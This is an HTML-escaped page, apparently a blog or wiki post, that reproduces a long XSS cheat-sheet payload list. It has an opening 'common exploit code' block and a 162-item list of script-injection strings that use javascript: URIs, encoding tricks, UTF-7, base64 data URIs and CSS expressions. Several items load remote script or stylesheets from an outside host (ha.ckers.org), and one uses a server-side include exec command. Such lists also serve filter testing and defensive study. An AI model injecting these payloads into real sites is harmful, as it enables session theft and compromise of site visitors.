&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
